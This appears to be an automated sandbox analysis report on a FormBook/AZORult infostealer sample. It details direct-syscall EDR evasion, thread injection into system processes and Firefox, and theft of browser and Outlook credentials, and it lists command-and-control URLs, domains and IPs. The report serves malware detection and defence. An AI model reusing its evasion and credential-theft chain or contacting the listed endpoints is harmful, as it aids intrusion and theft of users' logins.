                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D280A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00D280A9
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CFA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CFA155
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CFA124 SetUnhandledExceptionFilter,0_2_00CFA124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtClose: Direct from: 0x77537B2E
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtAllocateVirtualMemory: Direct from: 0x77542BECJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtClose: Direct from: 0x77542B6C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtAllocateVirtualMemory: Direct from: 0x77543C9CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\ROUTE.EXEThread register set: target process: 8152Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\ROUTE.EXEThread APC queued: target process: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2868008Jump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D287B1 LogonUserW,0_2_00D287B1
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00CD3B3A
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00CD48D7
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D34C53 mouse_event,0_2_00D34C53
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\gH3LlhcRzg.exe"Jump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D27CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00D27CAF
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D2874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00D2874B
                Source: gH3LlhcRzg.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: YLmLMhEKNXTfg.exe, 00000006.00000002.3227053331.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000000.1628689843.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000000.1778541629.0000000001261000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: gH3LlhcRzg.exe, YLmLMhEKNXTfg.exe, 00000006.00000002.3227053331.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000000.1628689843.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000000.1778541629.0000000001261000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: YLmLMhEKNXTfg.exe, 00000006.00000002.3227053331.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000000.1628689843.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000000.1778541629.0000000001261000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: YLmLMhEKNXTfg.exe, 00000006.00000002.3227053331.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000000.1628689843.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000000.1778541629.0000000001261000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF862B cpuid 0_2_00CF862B
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D04E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D04E87
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D11E06 GetUserNameW,0_2_00D11E06
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D03F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00D03F3A
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00CD49A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3226300583.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3225975390.0000000000720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1711994414.00000000069E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3227836129.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3229916982.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3227680610.0000000005F40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1711288888.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1716772538.00000000088D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: gH3LlhcRzg.exeBinary or memory string: WIN_81
                Source: gH3LlhcRzg.exeBinary or memory string: WIN_XP
                Source: gH3LlhcRzg.exeBinary or memory string: WIN_XPe
                Source: gH3LlhcRzg.exeBinary or memory string: WIN_VISTA
                Source: gH3LlhcRzg.exeBinary or memory string: WIN_7
                Source: gH3LlhcRzg.exeBinary or memory string: WIN_8
                Source: gH3LlhcRzg.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3226300583.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3225975390.0000000000720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1711994414.00000000069E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3227836129.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3229916982.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3227680610.0000000005F40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1711288888.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1716772538.00000000088D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D46283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00D46283
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D46747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00D46747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588237 Sample: gH3LlhcRzg.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.pitaloka.xyz 2->28 30 www.366800008.xyz 2->30 32 10 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 gH3LlhcRzg.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 YLmLMhEKNXTfg.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 ROUTE.EXE 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 YLmLMhEKNXTfg.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.unlimitu.website 209.74.79.40, 49980, 49981, 49982 MULTIBAND-NEWHOPEUS United States 22->34 36 031233226.xyz 144.76.229.203, 49988, 49989, 49990 HETZNER-ASDE Germany 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                gH3LlhcRzg.exe37%VirustotalBrowse
                gH3LlhcRzg.exe91%ReversingLabsWin32.Trojan.AZORult
                gH3LlhcRzg.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://www.dejikenkyu.cyou/58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp0%Avira URL Cloudsafe
                http://www.unlimitu.website/bhgd/0%Avira URL Cloudsafe
                http://www.rpa.asia/74m3/0%Avira URL Cloudsafe
                http://www.pitaloka.xyz0%Avira URL Cloudsafe
                http://www.deacapalla.online/9tt6/?bdi02je=R3jpuUkZ7EJX4jqjTcmTvUqnmsYgEhE9uoYGKZnTkeq/io5yCJ6WA6X9pqF204rzk7Rku8NUjH1PNJ500I+1+upb+vrNHTsmBA3bSTQzlk0fY+b/7g==&dZOh=OjIxv40%Avira URL Cloudsafe
                http://www.deacapalla.online/9tt6/0%Avira URL Cloudsafe
                http://digi-searches.com/sk-logabpstatus.php?a=bFp4ODVzaXVsTFczSDdQcmZwbFVZRVY1RlBJVDJnQi9jS1A1dmQ1d0%Avira URL Cloudsafe
                http://www.031233226.xyz/lgqt/?dZOh=OjIxv4&bdi02je=MFLEYxMapfQGVvab2mlHik76Wq9wcc6WcK+9EDc9rbcpz4NQWkVXiWg1fs3lc2q3xV4dwTIV5BZ4nWHdDq3R5n+AFpmJ+Ly/L7LDS8t/ZQ+0r1kIoA==0%Avira URL Cloudsafe
                http://www.einpisalpace.shop/2jc0/?bdi02je=02ITxlk7k5y73RXcEgyHf9eN5gBctaG4x5Z2Hm75JBt4EXaberRL5XNENm6Llqf4eDkRLvOACOcTLUte5cKTzLCIux+gwKEOB3rpq+QpBMz0/Iw+6w==&dZOh=OjIxv40%Avira URL Cloudsafe
                http://www.grimbo.boats/nuxf/0%Avira URL Cloudsafe
                http://digi-searches.com/px.js?ch=10%Avira URL Cloudsafe
                http://www.rpa.asia/74m3/?bdi02je=J07XWb6rRWuGJO5SkIECj5J69naqA0tAtwFpxaaB1F5KpFfZVTdv5vYkc6nIFzVKRu12SI0yHkyXUlDnhtlAoXgrV2iwEhrPt5IYDg3jm5H2VeGVpg==&dZOh=OjIxv40%Avira URL Cloudsafe
                http://einpisalpace.shop/0%Avira URL Cloudsafe
                http://digi-searches.com/px.js?ch=20%Avira URL Cloudsafe
                http://www.pitaloka.xyz/iwk9/0%Avira URL Cloudsafe
                http://www.031233226.xyz/lgqt/0%Avira URL Cloudsafe
                http://www.autonomousoid.pro/m1if/?dZOh=OjIxv4&bdi02je=hiCoNEWGLC+Yg+zH5qyDJS8Tq+9V0ljPyONuz3p+KqtlUJtklaaxXDftOiQ9jJfXeExikA9YAACl/ybcrnRwiKLR5knuCHWqVGESqivBmZbTiOmCPw==0%Avira URL Cloudsafe
                http://www.unlimitu.website/bhgd/?bdi02je=DwyTInzmM2N6MB8bA7Kl2rVP63jkNCBYgQInoYuWZdnLNHmEAu6R7FKnDf8o91RvtQ4ecsZhKZdUKJWxgxNcuNlYaUz0Gu0z3h0NSBZTW/WoATRTDg==&dZOh=OjIxv40%Avira URL Cloudsafe
                http://www.dejikenkyu.cyou/58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp+GE0WFWsNtmNdDn5tG/BYSJ7zzhJcA1CBHzR3dh5eCk2y1Rogmf0tN3zZBB6GTJ43iUX+nETgktO5t+JdjWSzaOjXca9ruuKiduGBOEEQ==0%Avira URL Cloudsafe
                http://www.autonomousoid.pro/m1if/0%Avira URL Cloudsafe
                http://www.dejikenkyu.cyou/58m5/0%Avira URL Cloudsafe
                http://www.grimbo.boats/nuxf/?bdi02je=6auJ0yMi6OdsOmW1PnEOwtKK+9KMlfd7htFlcJBIKY8nc6XduaXwfvOOo77xMmoGODzG8ol9XftCv+9phUBaDXIrAZJse5hp6wCZHpS5iNqkumbbXg==&dZOh=OjIxv40%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.deacapalla.online
                		208.91.197.27
                		truetrue
                  		unknown
